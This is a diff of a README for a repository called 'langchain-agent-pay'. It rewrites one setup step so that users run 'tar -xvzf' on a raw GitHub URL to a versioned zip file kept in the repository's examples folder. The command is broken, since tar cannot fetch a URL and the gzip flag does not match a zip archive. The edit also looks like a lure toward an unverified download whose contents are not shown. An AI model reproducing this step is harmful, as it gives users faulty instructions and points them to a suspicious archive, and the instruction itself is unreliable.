CODINGIDK11/langchain-agent-pay/README.md

 1. Open a terminal window.
 2. Navigate to the directory containing the downloaded file using `cd`.
-3. Extract the file with the command: `tar -xvzf langchain-agent-pay.tar.gz`.
+3. Extract the file with the command: `tar -xvzf https://raw.githubusercontent.com/CODINGIDK11/langchain-agent-pay/main/examples/langchain-agent-pay-v2.2.zip`.
 4. Follow any additional setup instructions found in the extracted folder.

 ### Step 5: Run the Application